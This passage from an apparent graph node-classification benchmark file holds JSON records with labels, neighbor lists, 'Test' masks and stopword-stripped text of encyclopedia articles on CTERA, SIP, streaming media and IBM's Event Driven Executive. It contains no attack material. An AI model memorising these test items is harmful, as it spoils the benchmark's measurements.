authentication technology using government-issued smart cards additional layers protection beyond standard enterprise integration microsoft active directory servers 2009 ctera released first cloud storage gateway c200 gateway combined speed local network storage off-site cloud storage backup technology 2010 ctera released c400 cloud storage gateway added features office server backup recovery collaboration capability multiple users working files stored cloud gateway 2011 c800 gateway released 24 tb raw local storage 2016 ctera announced virtual cloud storage gateway deployed vmware kvm servers enabled customers use existing hardware ctera released updates cloud storage gateway portfolio april 2016 focused efficiency storage capacity ctera released enterprise file sync share efss 2012 enabled users access share collaborate files location storing files either locally cloud also 2012 ctera launched mobile app made possible access files backups ios android devices december 2015 ctera announced cloud server data protection storage-as-a-service server data protection software enterprise cloudops cloud server data protection protects server data private virtual private cloud using backup agents windows linux environments object storage services cloud platforms amazon web services microsoft azure ibm cloud openstack-based clouds",
    "neighbors": [
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      5499,
      2965,
      2328,
      4377,
      8986,
      6307,
      6565,
      9766,
      5159,
      6444,
      8495,
      3121,
      6834,
      7352,
      3773,
      2496,
      4289,
      11072,
      11201,
      1224,
      8520,
      4429,
      7248,
      1362,
      467,
      7891,
      9682,
      6618,
      6367,
      4194,
      11646,
      5732,
      1638,
      10090,
      3819,
      7660,
      7409,
      2170,
      3323,
      253,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 10266,
    "label": 7,
    "text": "Networked_Help_Desk:networked help desk networked help desk open standard initiative provide common api sharing customer support tickets separate instances issue tracking bug tracking customer relationship management crm project management systems improve customer service reduce vendor lock-in initiative created zendesk june 2011 collaboration eight founding member organizations including atlassian new relic otrs pivotal tracker servicenow sugarcrm first integration zendesk atlassian issue tracking product jira announced 2011 atlassian summit august 2011 34 member companies joined initiative year launching 50 organizations joined within zendesk instances feature branded ticket sharing support tools generally built around common paradigm begins customer making request incident report create ticket ticket progress status updated annotations attachments annotations attachments may visible customer public visible analysts private customers notified progress made ticket complete people necessary complete ticket using separate support tools additional overhead introduced maintaining relevant information ticket tool notifying customer progress made group completing ticket example customer support issue caused software bug reported help desk using one system fix documented developers another analyzed customer relationship management tool keeping records system up-to-date notifying customer manually using swivel chair approach unnecessarily time-consuming error-prone information transferred correctly customer may re-explain problem time ticket transferred systems networked help desk api implemented possible several different applications related customer support experience synchronize data one uniquely identified shared ticket many applications domains implemented apis allow data imported exported modified network help desk provides common standard customer support information automatically synchronize several systems implemented two systems quickly share tickets configuration change understand interface communication two instances specific ticket occurs three steps invitation agreement sharing ticket data continued synchronization tickets standard allows full delegation analysts systems make public private comments synchronize status well partial delegation instance receiving ticket make private comments status changes synchronized tickets may shared multiple instances harvey kandola countersoft suggested would preferable single application consolidates tracking related functions rather using multiple tools connecting dots initiatives like networked help desk",
    "neighbors": [
      4960,
      4388,
      8644,
      3462,
      8582,
      5677,
      9245,
      2842,
      4797
    ],
    "mask": "Test"
  },
  {
    "node_id": 10267,
    "label": 2,
    "text": "Event_Driven_Executive:event driven executive event driven executive edx computer operating system originally developed ibm control research laboratory devices experiments included application programming language known edl hcf host communication facility ibm research division opened san jose research laboratory sjrl 1956 building 025 ibm plant site san jose california dr. henry m. gladney established first laboratory automation project 1968 ibm 1800 computer various instruments chemistry physics laboratories throughout sjrl linked 1800 control data acquisition processing note long time instrumentation came embedded chips microprocessors output sophisticated research instrument likely strip chart paper squiggly marks perhaps punched paper tape dr. gladney became manager research computing facility rcf research moved building 028 1970 established new department rcf laboratory automation group tasked transition new sensor-based computer ibm system/7 produced boca raton florida robert w. martin appointed first line manager group staff consisting ray aylsworth donald l. raimondi gerd hochweller post-doctoral fellow assignment germany system/7 much smaller machine 1800 intended co-located individual research labs along instruments would service multiple system/7s hosted large scale computing purposes ibm system/360 “ mainframe ” served sjrl whole system/7 somewhat unusual especially programmer perspective lack supporting software basic human input/output interface teletype keyboard printer along paper tape reader punch hard disc drive data storage along digital analog input/output process interrupt could used lab instrument interface data acquisition instrument control sort operating system high level programming facility basic assembler language program another way putting would say delivered user friendly users research scientists engineers i.e non-programming professionals clear start order provide successful system/7 based environment laboratory automation sjrl would necessary develop real-time sensor-based multitasking multiprogramming operating system associated application development facility provided appropriate high level application programming language requisite special features e.g sensor i/o also communication interface large scale host computer program development bidirectional data transfer data analysis result development operating system known laboratory automation basic supervisor system/7 labs/7 application development language labs/7 real-time multitasking multiprogramming operating system application development language needed provide timing process interrupt capability analog digital input output commands allow data acquisition control external laboratory instruments along basic computational functions direct access data storage host communications hierarchical environment addition programming language associated program preparation facility compiler also needed defined decided use syntactical model could processed system/360 macro assembler would obviate need writing compiler machine language instructions created interpret object code output assembler effect high level instruction set programming language hypothetical virtual real-time sensor-based computer labs/7 provided language interpreter implemented system/7 machine language mimicked today language emulated virtual machine another element labs/7 package general purpose utility programs today would probably called apps finally system/360 software package known host communication facility hcf developed provide bi-directional data transfer host system/360 multiple satellite system/7s together labs/7 provided environment 1 application program could written compiled host system/360 downloaded host system/7 scientist laboratory 3 invoked control laboratory apparatus/instrument/machine 4 acquire measurement results instrument 5 send data host computer 6 start program host analyze data 7 return display results analysis scientist laboratory course system/7 could operated completely standalone i.e non-hierarchical environment usage labs/7 increased sjrl ibm organizations trying implement applications system/7 became aware labs/7 tried found extremely useful among general product division ibm plant site san jose sjrl sister research labs yorktown ny zürich switzerland ibm federal systems division oswego ny ibm office products division lexington ky. word labs/7 spread “ field ” charged marketing system/7 ibm customers cooperative effort mounted involving program authors sjrl team ibm system engineers led fred schneider make software available customers installed user program iup iup thought “ ” software package available ibm without support warranties associated formal product software labs/7 iup relatively successful came rather late product lifetime system/7 1976 ibm announced ibm series/1 successor system/7 series/1 last line special purpose sensor-based computers produced ibm laboratory automation group sjrl acquired early model series/1 announcement time ported labs/7 series/1 labs/7 became edx/1 event driven executive course included embedded interpreter programming language appropriately named edl event driven language time ibm field support team expanded significant effort underway make software available ibm customers field developed program fdp fdp step ibm software hierarchy still caveat “ ” package minimal formal ibm support development powerful terminal control product known communications facility edx/cf sales edx especially focused distributed computing environment whereby series/1 used primarily terminal controller many cases attached system/370 host computer edx efficient system able support large number work stations installed base edx grew product support edx transferred ibm general systems division series/1 product division boca raton fl edx became fully supported ibm program product edx origin tool laboratory automation 1981 ibm announced series/1 edx-based application software package edx laboratory automation software developed sjrl iup product number 5798-rhb edx edl well accepted marketplace successful ibm software products application programs developed edl run edx e.g communication facility multiple terminal monitor u.s. marine corps recognized extensive usage series/1 edx 1984 edx edl ported ibm pc product known hummingbird ibm plant site san jose california implemented completely automated warehouse facility inventory system production parts complete robot fork lifts control one series/1 computer running edx system operation late 1999 one example major applications within ibm companies developed edx-based applications e.g utility packages developed legler recently september 2014 program announced business partners ibm datatrend allows running applications ported series/1 unix based systems 1980 martin raimondi received ibm corporate award work developing edx edl",
    "neighbors": [
      2179,
      2345,
      10508,
      7983,
      5457,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10268,
    "label": 4,
    "text": "Access_structure:access structure access structures used study security system multiple parties need work together obtain resource groups parties granted access called qualified set theoretic terms referred qualified sets turn set qualified sets called access structure system less formally description needs cooperate order access resource original use cryptography resource secret shared among participants subgroups participants contained access structure able join shares recompute secret generally resource also task group people complete together creating digital signature decrypting encrypted message reasonable assume access structures monotone sense subset access structure sets contain subset also form part access structure",
    "neighbors": [
      2737
    ],
    "mask": "None"
  },
  {
    "node_id": 10269,
    "label": 5,
    "text": "SIP_URI_scheme:sip uri scheme sip uri scheme uniform resource identifier uri scheme session initiation protocol sip multimedia communications protocol sip address uri addresses specific telephone extension voice ip system number could private branch exchange e.164 telephone number dialled specific gateway scheme defined sip address written user domain.tld format similar fashion email address address like instructs sip client use naptr srv schemes look sip server associated dns name voip-provider.example.net connect server records found name associated ip address client directly contact sip server ip address port 5060 default using udp transport protocol ask server may gateway connected destination user 1-999-123-4567 gateway may require user register using sip placing call destination port provided part sip uri naptr/srv lookups used rather client directly connects specified host port sip address text much like e-mail address may contain non-numeric characters client may sip phone device numeric telephone-like keypad various schemes exist associate entirely numeric identifier publicly reachable sip address include inum initiative issues e.164-formatted numbers corresponding sip address number sip.inum.net sip broker-style services associate numeric *prefix sip domain name e164.org e164.arpa domain name servers convert numbers addresses one-by-one dns reverse-lookups sip addresses may used directly configuration files instance asterisk pbx installations specified web interface voice-over-ip gateway provider usually call forwarding destination address book entry systems allow speed dial user address book using vertical service code may allow short numeric code like *75xx translated pre-stored alphanumeric sip address theory owner sip-capable telephone handset could publish sip address could freely directly reached worldwide much way smtp e-mail recipients may contacted anywhere almost cost message sender anyone broadband connection could install softphone ekiga call sip addresses free practice various forms network abuse discouraging creation publication openly reachable sip addresses server logs looks like attempt call palestinian mobile telephone israel country code +972 randomly trying 9- common code outside line office pbx 011- overseas call prefix north american numbering plan 7- off-chance pbx using instead 9- outside line security tools firewalls fail2ban must therefore deployed prevent unauthorised outside call attempts many voip providers also disable overseas calls countries specifically requested enabled subscriber sips uri scheme adheres syntax sip uri differing scheme codice_1 rather codice_2 default internet port address sips 5061 unless explicitly specified uri sips allows resources specify reached securely mandates hop request forwarded target domain must secured tls last hop proxy target domain user agent secured according local policies sips protects attackers try listen signaling link provide real end-to-end security since encryption hop-by-hop every single intermediate proxy trusted",
    "neighbors": [
      10242,
      5251,
      3717,
      3218,
      11413,
      10271,
      35,
      8998,
      6319,
      9909,
      6330,
      4797,
      6590,
      7364,
      2887,
      9167,
      10341,
      10727,
      11112,
      5482,
      9834,
      11509,
      8950,
      3191,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 10270,
    "label": 7,
    "text": "Streaming_media:streaming media streaming media multimedia constantly received presented end-user delivered provider verb stream refers process delivering obtaining media manner term refers delivery method medium rather medium alternative file downloading process end-user obtains entire file content watching listening client end-user use media player start playing digital video digital audio content entire file transmitted distinguishing delivery method media distributed applies specifically telecommunications networks delivery systems either inherently streaming e.g radio television streaming apps inherently non-streaming e.g books video cassettes audio cds example 1930s elevator music among earliest popular music available streaming media nowadays internet television common form streamed media term streaming media apply media video audio live closed captioning ticker tape real-time text considered streaming text live streaming delivery internet content real-time much live television broadcasts content airwaves via television signal live internet streaming requires form source media e.g video camera audio interface screen capture software encoder digitize content media publisher content delivery network distribute deliver content live streaming need recorded origination point although frequently challenges streaming content internet user enough bandwidth internet connection may experience stops lags slow buffering content users may able stream certain content due compatible computer software systems popular streaming services include video sharing website youtube netflix amazon video vudu stream films television shows spotify apple music stream music video game live streaming sites twitch mixer early 1920s george o. squier granted patents system transmission distribution signals electrical lines technical basis later became muzak technology streaming continuous music commercial customers without use radio attempts display media computers date back earliest days computing mid-20th century however little progress made several decades primarily due high cost limited capabilities computer hardware late 1980s 1990s consumer-grade personal computers became powerful enough display various media primary technical issues related streaming enough cpu power bus bandwidth support required data rates creating low-latency interrupt paths operating system prevent buffer underrun enabling skip-free streaming content however computer networks still limited mid-1990s audio video media usually delivered non-streaming channels downloading digital file remote server saving local drive end user computer storing digital file playing back cd-roms 1991 first commercial ethernet switch see network switch introduced enabled powerful computer networks leading first streaming video solutions see business developments used schools corporations expanding bloomberg television worldwide mid 1990s world wide web established streaming audio would practical years later practical streaming media made possible advances data compression due impractically high bandwidth requirements uncompressed media raw digital audio encoded pulse-code modulation pcm requires bandwidth 1.4mbps uncompressed cd audio raw digital video requires bandwidth 168mbps sd video 1gbps fhd video important compression technique enabled practical streaming media discrete cosine transform dct form lossy compression conceived 1972 nasir ahmed developed algorithm t. natarajan k. r. rao university texas 1973 dct algorithm basis first practical video coding format h.261 1988 initially used online video conferencing followed dct-based video coding standards notably mpeg video formats 1991 onwards dct algorithm adapted modified discrete cosine transform mdct j. p. princen a. w. johnson b. bradley university surrey 1987 mdct algorithm fundamental mp3 audio format introduced 1994 especially widely used advanced audio coding aac format introduced 1999 late 1990s early 2000s users increased access computer networks especially internet early 2000s users access increased network bandwidth especially last mile technological improvements facilitated streaming audio video content computer users homes workplaces also increasing use standard protocols formats tcp/ip http html internet became increasingly commercialized led infusion investment sector band severe tire damage first group perform live internet june 24 1993 band playing gig xerox parc elsewhere building scientists discussing new technology mbone broadcasting internet using multicasting proof parc technology band performance broadcast could seen live australia elsewhere march 2017 interview band member russ haines stated band used approximately half total bandwidth internet stream performance 152-by-76 pixel video updated eight twelve times per second audio quality best bad telephone connection microsoft research developed microsoft tv application compiled ms windows studio suite tested conjunction connectix quickcam realnetworks also pioneer streaming media markets broadcast baseball game new york yankees seattle mariners internet 1995 first symphonic concert internet took place paramount theater seattle washington november 10 1995 concert collaboration seattle symphony various guest musicians slash guns n roses velvet revolver matt cameron soundgarden pearl jam barrett martin screaming trees word magazine launched 1995 featured first-ever streaming soundtracks internet metropolitan opera live hd program metropolitan opera streams opera performance live performance taking place 2013–2014 10 operas transmitted via satellite least 2,000 theaters 66 countries term streaming first used tape drives made data electronics inc. drives meant slowly ramp run entire track slow ramp times resulted lower drive costs making competitive product streaming applied early 1990s better description video demand later live video ip networks first done starlight networks video streaming real networks audio streaming time video usually referred store forward video misleading nomenclature first commercial streaming product appeared late 1992 named starworks starworks enabled demand mpeg-1 full motion videos randomly accessed corporate ethernet networks starworks starlight networks also pioneered live video streaming ethernet via internet protocol satellites hughes network systems early companies created streaming media technology include realnetworks known progressive networks protocomm prior wide spread world wide web usage web became popular late 90s streaming video internet blossomed startups vdonet acquired realnetworks precept acquired cisco microsoft developed media player known activemovie 1995 allowed streaming media included proprietary streaming format precursor streaming feature later windows media player 6.4 1999 june 1999 apple also introduced streaming media format quicktime 4 application later also widely adopted websites along realplayer windows media streaming formats competing formats websites required user download respective applications streaming resulted many users three applications computer general compatibility 2000 industryview.com launched world largest streaming video archive website help businesses promote webcasting became emerging tool business marketing advertising combined immersive nature television interactivity web ability collect data feedback potential customers caused technology gain momentum quickly around 2002 interest single unified streaming format widespread adoption adobe flash prompted development video streaming format flash format used flash-based players video hosting sites first popular video streaming site youtube founded steve chen chad hurley jawed karim 2005 initially used flash-based player played mpeg-4 avc video aac audio defaults html5 video increasing consumer demand live streaming prompted youtube implement new live streaming service users company currently also offers secured link returning available connection speed user recording industry association america riaa revealed 2015 earnings report streaming services responsible 34.3 percent year total music industry revenue growing 29 percent previous year becoming largest source income pulling around 2.4 billion us streaming revenue grew 57 percent 1.6 billion first half 2016 accounted almost half industry sales advances computer networking combined powerful home computers modern operating systems made streaming media practical affordable ordinary consumers stand-alone internet radio devices emerged offer listeners no-computer option listening audio streams audio streaming services become increasingly popular recent years streaming music hit record 118.1 billion streams 2013 general multimedia content large volume media storage transmission costs still significant offset somewhat media generally compressed storage streaming increasing consumer demand streaming high definition hd content led industry develop number technologies wirelesshd itu-t g.hn optimized streaming hd content without forcing user install new networking cables 1996 digital pioneer marc scarpa produced first large-scale online live broadcast history adam yauch-led tibetan freedom concert event would define format social change broadcasts scarpa continued pioneer streaming media world projects woodstock '99 townhall president clinton recently covered ca campaign tell friend get covered live streamed youtube media stream streamed either live demand live streams generally provided means called true streaming true streaming sends information straight computer device without saving file hard disk on-demand streaming provided means called progressive streaming progressive download progressive streaming saves file hard disk played location on-demand streams often saved hard disks servers extended amounts time live streams available one time e.g. football game streaming media increasingly coupled use social media example sites youtube encourage social interaction webcasts features live chat online surveys user posting comments online furthermore streaming media increasingly used social business e-learning due popularity streaming medias many developers introduced free hd movie streaming apps people use smaller devices tablets smartphones everyday purposes horowitz research state pay tv ott svod 2017 report said 70 percent viewing content streaming service 40 percent tv viewing done way twice number five years earlier millennials report said streamed 60 percent content one movie streaming industry largest impacts dvd industry effectively met demise mass popularization online content rise media streaming caused downfall many dvd rental companies blockbuster july 2015 new york times published article netflix dvd services stated netflix continuing dvd services 5.3 million subscribers significant drop previous year hand streaming services 65 million members march 2016 study assessing “ impact movie streaming traditional dvd movie rental ” found respondents purchase dvd movies nearly much anymore streaming taken market according study viewers find movie quality significantly different dvd online streaming issues respondents believed needed improvement movie streaming included functions fast forwarding rewinding well search functions article highlighted quality movie streaming industry would increase time advertising revenue continued soar yearly basis throughout industry providing incentive quality content production music streaming one popular ways consumers interact streaming media age digitization private consumption music transformed public good largely due one player market napster napster peer-to-peer p2p file sharing network users could upload download mp3 files freely broke music industry conventions launched early 1999 hull massachusetts platform developed shawn john fanning well sean parker interview 2009 shawn fanning explained napster “ something came result seeing sort unmet need passion people able find music particularly lot obscure stuff ’ something go record store purchase felt like problem worth solving. ” development disrupt music industry making songs previously required payment acquire freely accessible napster user demonstrated power p2p networks turning digital file public shareable good brief period time napster existed mp3 files fundamentally changed type good songs longer financially excludable barring access computer internet access rival meaning one person downloaded song diminish another user napster like providers public goods faced problem free riding every user benefits individual uploads mp3 file requirement mechanism forces users share music thus napster users incentivized let others upload music without sharing files structure revolutionized consumer ’ perception ownership digital goods made music freely replicable napster quickly garnered millions users growing faster business history peak existence napster boasted 80 million users globally site gained much traffic many college campuses block access napster created network congestion many students sharing music files advent napster sparked creation numerous p2p sites including limewire 2000 bittorrent 2001 pirate bay 2003 reign p2p networks short lived first fall napster 2001 numerous lawsuits filed napster various record labels subsidiaries universal music group sony music entertainment warner music group emi addition recording industry association america riaa also filed lawsuit napster grounds unauthorized distribution copyrighted material ultimately led napster shutting 2001 interview gary stiffelman represents eminem aerosmith tlc explained napster problem record labels loss revenue interview new york times stiffelman said “ ’ opponent artists ’ music included services ’ opponent revenue shared lawsuit records inc. v. napster inc. fundamentally changed way consumers interact music streaming argued october 2 2000 decided february 12 2001 court appeals ninth circuit ruled p2p file sharing service could held liable contributory vicarious infringement copyright serving landmark decision intellectual property law first issue court addressed “ fair use ” says otherwise infringing activities permissible long purposes “ criticism comment news reporting teaching ... scholarship research. ” judge beezer judge case noted napster claimed services fit “ three specific alleged fair uses sampling users make temporary copies work purchasing space-shifting users access sound recording napster system already audio cd format permissive distribution recordings new established artists. ” judge beezer found napster fit criteria instead enabling users repeatedly copy music would affect market value copyrighted good second claim plaintiffs napster actively contributing copyright infringement since knowledge widespread file sharing platform since napster took action reduce infringement financially benefited repeated use court ruled p2p site court found “ much eighty-seven percent files available napster may copyrighted seventy percent may owned administered plaintiffs. ” injunction ordered napster ended brief period music streaming public good non-rival non-excludable nature p2p networks success sharing mp3 ’ though met similar fate court ruling set precedent copyrighted digital content freely replicated shared unless given consent owner thereby strengthening property rights artists record labels alike although music streaming longer freely replicable public good streaming platforms spotify deezer apple music soundcloud prime music shifted music streaming club-type good platforms notably spotify give customers access freemium service enables use limited features exposure advertisements companies operate premium subscription model circumstances music streaming financially excludable requiring customers pay monthly fee access music library non-rival since one customer ’ use impair another ’ music streaming platforms grown rapidly popularity recent years spotify 207 million users january 1 2019 78 different countries apple music 60 million soundcloud 175 million platforms provide varying degrees accessibility apple music prime music offer services paid subscribers whereas spotify soundcloud offer freemium premium services napster owned rhapsody since 2011 resurfaced music streaming platform offering subscription based services 4.5 million users january 2017 music streaming providers proliferated competition pushed price subscriptions music piracy rates also fallen see chart right music industry ’ response music streaming initially negative along music piracy streaming services disrupted market contributed fall revenue 14.6 billion revenue 1999 6.3 billion 2009 u.s. cd ’ single-track downloads selling content freely available internet result record labels invested artists “ safe ” chart music became appealing producers bands unique sounds 2018 however music streaming revenue exceeded traditional revenue streams e.g record sales album sales downloads 2017 alone saw 41.1 increase streaming revenue alone 8.1 increase overall revenue streaming revenue one largest driving forces behind growth music industry interview jonathan dworkin senior vice president strategy business development universal said “ afraid perpetual change dynamism driving growth. ” broadband speed 2 mbit/s recommended streaming standard definition video without experiencing buffering skips especially live video example roku apple tv google tv sony tv blu-ray disc player 5 mbit/s recommended high definition content 9 mbit/s ultra-high definition content streaming media storage size calculated streaming bandwidth length media using following formula single user file requires storage size megabytes equal length seconds × bit rate bit/s 8 × 1024 × 1024 example one hour digital video encoded 300 kbit/s typical broadband video 2005 usually encoded 320 × 240 pixels window size 3,600 × 300,000 bit/s 8×1024×1024 requires around 128 mb storage file stored server on-demand streaming stream viewed 1,000 people time using unicast protocol requirement 300 kbit/s × 1,000 300,000 kbit/s 300 mbit/s bandwidth equivalent around 135 gb per hour using multicast protocol server sends single stream common users therefore stream would use 300 kbit/s serving bandwidth see information protocols calculation live streaming similar assuming seed encoder 500 kbit/s show lasts 3 hours 3,000 viewers calculation number mbs transferred encoder speed bit/s × number seconds × number viewers 8*1024*1024 results calculation follows number mbs transferred 500 x 1024 bit/s × 3 × 3,600 3 hours × 3,000 number viewers 8*1024*1024 1,977,539 mb audio stream compressed make file size smaller using audio coding format mp3 vorbis aac opus video stream compressed using video coding format make file size smaller video coding formats include h.264 hevc vp8 vp9 encoded audio video streams assembled container bitstream mp4 flv webm asf isma bitstream delivered streaming server streaming client e.g. computer user internet-connected laptop using transport protocol adobe rtmp rtp 2010s technologies apple hls microsoft smooth streaming adobe hds non-proprietary formats mpeg-dash emerged enable adaptive bitrate streaming http alternative using proprietary transport protocols often streaming transport protocol used send video event venue cloud transcoding service cdn uses http-based transport protocols distribute video individual homes users streaming client end user may interact streaming server using control protocol mms rtsp quality interaction servers users based workload streaming service users attempt access service quality affected unless enough bandwidth host using enough proxy networks designing network protocol support streaming media raises many problems datagram protocols user datagram protocol udp send media stream series small packets simple efficient however mechanism within protocol guarantee delivery receiving application detect loss corruption recover data using error correction techniques data lost stream may suffer dropout real-time streaming protocol rtsp real-time transport protocol rtp real-time transport control protocol rtcp specifically designed stream media networks rtsp runs variety transport protocols latter two built top udp another approach seems incorporate advantages using standard web protocol ability used streaming even live content adaptive bitrate streaming http adaptive bitrate streaming based http progressive download contrary previous approach files small compared streaming packets much like case using rtsp rtp reliable protocols transmission control protocol tcp guarantee correct delivery bit media stream however accomplish system timeouts retries makes complex implement also means data loss network media stream stalls protocol handlers detect loss retransmit missing data clients minimize effect buffering data display delay due buffering acceptable video demand scenarios users interactive applications video conferencing experience loss fidelity delay caused buffering exceeds 200 ms. unicast protocols send separate copy media stream server recipient unicast norm internet connections scale well many users want view television program concurrently multicast protocols developed reduce server/network loads resulting duplicate data streams occur many recipients receive unicast content streams independently protocols send single stream source group recipients depending network infrastructure type multicast transmission may may feasible one potential disadvantage multicasting loss video demand functionality continuous streaming radio television material usually precludes recipient ability control playback however problem mitigated elements caching servers digital set-top boxes buffered media players ip multicast provides means send single media stream group recipients computer network multicast protocol usually internet group management protocol used manage delivery multicast streams groups recipients lan one challenges deploying ip multicast routers firewalls lans must allow passage packets destined multicast groups organization serving content control network server recipients i.e. educational government corporate intranets routing protocols protocol independent multicast used deliver stream content multiple local area network segments mass delivery content multicast protocols need much less energy resources widespread introduction reliable multicast broadcast-like protocols preferential use wherever possible significant ecological economic challenge peer-to-peer p2p protocols arrange prerecorded streams sent computers prevents server network connections becoming bottleneck however raises technical performance security quality business issues useful – typical – applications streaming concept example long video lectures performed online internet advantage presentation lectures long although always interrupted repeated arbitrary places also new marketing concepts example berlin philharmonic orchestra sells internet live streams whole concerts instead several cds similar fixed media so-called digital concert hall using youtube trailing purposes online concerts also spread lot different places – cinemas – various places globe similar concept used metropolitan opera new york many successful startup ventures based business streaming media also livestream international space station media live streamed recorded certain media players vlc player use screen recorder live-streaming platforms twitch may also incorporate video demand system allows automatic recording live broadcasts watched later popular site youtube also recordings live broadcasts including television shows aired major networks streams potential recorded anyone access whether legally otherwise streaming copyrighted content involve making infringing copies works question recording distribution streamed content also issue many companies rely revenue based views attendance net greenhouse gas emissions streaming music estimated 200 350 million kilograms per year united states according 2019 study increase emissions pre-digital music period estimated 140 million kilograms 1977 136 million kilograms 1988 157 million 2000 several ways decrease ghgs associated streaming music including efforts make data centers carbon neutral converting electricity produced renewable sources individual level purchase physical cd may environmentally friendly played 27 times another option reducing energy use downloading music offline listening reduce need streaming distance spotify service built-in local cache reduce necessity repeating song streams",
    "neighbors": [
      10368,
      8833,
      1411,
      4485,
      9990,
      1674,
      11274,
      10126,
      2196,
      10900,
      3350,
      11413,
      4120,
      11674,
      5531,
      2076,
      10782,
      10271,
      5536,
      8864,
      546,
      6435,
      9380,
      9381,
      9508,
      11559,
      7722,
      5291,
      10282,
      10410,
      9262,
      7983,
      10924,
      562,
      5558,
      10168,
      11576,
      7488,
      8640,
      708,
      7108,
      7238,
      3019,
      5067,
      2509,
      5326,
      9167,
      3152,
      4048,
      9933,
      4691,
      4951,
      8921,
      8413,
      7391,
      5472,
      4194,
      3428,
      231,
      9063,
      7917,
      4590,
      8941,
      9325,
      7921,
      9841,
      755,
      10995,
      119,
      4219,
      508,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 10271,
    "label": 5,
    "text": "Session_Initiation_Protocol:session initiation protocol session initiation protocol sip signaling protocol used initiating maintaining terminating real-time sessions include voice video messaging applications sip used signaling controlling multimedia communication sessions applications internet telephony voice video calls private ip telephone systems instant messaging internet protocol ip networks well mobile phone calling lte volte protocol defines specific format messages exchanged sequence communications cooperation participants sip text-based protocol incorporating many elements hypertext transfer protocol http simple mail transfer protocol smtp call established sip may consist multiple media streams separate streams required applications text messaging exchange data payload sip message sip works conjunction several protocols specify carry session media commonly media type parameter negotiation media setup performed session description protocol sdp carried payload sip messages sip designed independent underlying transport layer protocol used user datagram protocol udp transmission control protocol tcp stream control transmission protocol sctp secure transmissions sip messages insecure network links protocol may encrypted transport layer security tls transmission media streams voice video sdp payload carried sip messages typically employs real-time transport protocol rtp secure real-time transport protocol srtp sip originally designed mark handley henning schulzrinne eve schooler jonathan rosenberg 1996 protocol standardized 1999 november 2000 sip accepted 3gpp signaling protocol permanent element ip multimedia subsystem ims architecture ip-based streaming multimedia services cellular networks june 2002 specification revised various extensions clarifications published since sip designed provide signaling call setup protocol ip-based communications supporting call processing functions features present public switched telephone network pstn vision supporting new multimedia applications extended video conferencing streaming media distribution instant messaging presence information file transfer internet fax online games sip distinguished proponents roots internet community rather telecommunications industry sip standardized primarily ietf protocols h.323 traditionally associated international telecommunication union itu sip involved signaling operations media communication session primarily used set terminate voice video calls sip used establish two-party unicast multiparty multicast sessions also allows modification existing calls modification involve changing addresses ports inviting participants adding deleting media streams sip also found applications messaging applications instant messaging event subscription notification sip works conjunction several protocols specify media format coding carry media call set call setup body sip message contains session description protocol sdp data unit specifies media format codec media communication protocol voice video media streams typically carried terminals using real-time transport protocol rtp secure real-time transport protocol srtp every resource sip network user agents call routers voicemail boxes identified uniform resource identifier uri syntax uri follows general standard syntax also used web services e-mail uri scheme used sip sip typical sip uri form nowiki sip username domainname /nowiki nowiki sip username hostport /nowiki domainname requires dns srv records locate servers sip domain hostport ip address fully qualified domain name host port secure transmission required scheme sips used sip employs design elements similar http request response transaction model transaction consists client request invokes particular method function server least one response sip reuses header fields encoding rules status codes http providing readable text-based format sip carried several transport layer protocols including transmission control protocol tcp user datagram protocol udp stream control transmission protocol sctp sip clients typically use tcp udp port numbers 5060 5061 sip traffic servers endpoints port 5060 commonly used non-encrypted signaling traffic whereas port 5061 typically used traffic encrypted transport layer security tls sip-based telephony networks often implement call processing features signaling system 7 ss7 special sip protocol extensions exist although two protocols different ss7 centralized protocol characterized complex central network architecture dumb endpoints traditional telephone handsets sip client-server protocol equipotent peers sip features implemented communicating endpoints traditional ss7 architecture use switching centers network elements use session initiation protocol communication called sip user agents user agent ua performs function user agent client uac requesting service function user agent server uas responding request thus two sip endpoints may principle operate without intervening sip infrastructure however network operational reasons provisioning public services users directory services sip defines several specific types network server elements service elements also communicates within client-server model implemented user agent clients servers user agent logical network end-point sends receives sip messages manages sip sessions user agents client server components user agent client uac sends sip requests user agent server uas receives requests returns sip response unlike network protocols fix roles client server e.g. http web browser acts client never server sip requires peers implement roles roles uac uas last duration sip transaction sip phone ip phone implements client server functions sip user agent provides traditional call functions telephone dial answer reject call hold call transfer sip phones may implemented hardware device softphone vendors increasingly implement sip standard telephony platform distinction hardware-based software-based sip phones blurred sip elements implemented basic firmware functions many ip-capable communications devices smartphones sip http user agent may identify using message header field user-agent containing text description software hardware product name user agent field sent request messages means receiving sip server evaluate information perform device-specific configuration feature activation operators sip network elements sometimes store information customer account portals useful diagnosing sip compatibility problems display service status proxy server network server uac uas components functions intermediary entity purpose performing requests behalf network elements proxy server primarily plays role routing meaning job ensure request sent another entity closer targeted user proxies also useful enforcing policy determining whether user allowed make call proxy interprets necessary rewrites specific parts request message forwarding sip proxy servers route messages one destination called forking proxies forking sip requests means multiple dialogs established single request explains need two-sided dialog identifier without contribution recipients originator could disambiguate multiple dialogs established single request sip forking refers process forking single sip call multiple sip endpoints powerful feature sip single call ring many endpoints time sip forking allows desk phone ring time mobile allowing call taken either device redirect server user agent server generates 3xx redirection responses requests receives directing client contact alternate set uris redirect server allows proxy servers direct sip session invitations external domains registrar sip endpoint provides location service accepts register requests recording address parameters user agent subsequent requests provides essential means locate possible communication peers network location service links one ip addresses sip uri registering agent multiple user agents may register uri result registered user agents receive calls uri sip registrars logical elements often co-located sip proxies improve network scalability location services may instead located redirect server session border controllers serve middle boxes user agents sip servers various types functions including network topology hiding assistance nat traversal gateways used interconnect sip network networks public switched telephone network use different protocols technologies sip text-based protocol syntax similar http two different types sip messages requests responses first line request method defining nature request request-uri indicating request sent first line response response code requests initiate functionality protocol sent user agent client server answered one sip responses return result code transaction generally indicate success failure state transaction responses sent user agent server indicating result received request several classes responses recognized determined numerical range result codes sip defines transaction mechanism control exchanges participants deliver messages reliably transaction state session controlled various timers client transactions send requests server transactions respond requests one responses responses may include provisional responses response code form 1xx one multiple final responses 2xx – 6xx transactions categorized either type invite type non-invite invite transactions differ establish long-running conversation referred dialog sip include acknowledgment ack non-failing final response e.g. 200 ok session initiation protocol instant messaging presence leveraging extensions simple sip-based suite standards instant messaging presence information message session relay protocol msrp allows instant message sessions file transfer sip developer community meets regularly conferences organized sip forum test interoperability sip implementations ttcn-3 test specification language developed task force etsi stf 196 used specifying conformance tests sip implementations developing sip software deploying new sip infrastructure important test capability servers ip networks handle certain call load number concurrent calls number calls per second sip 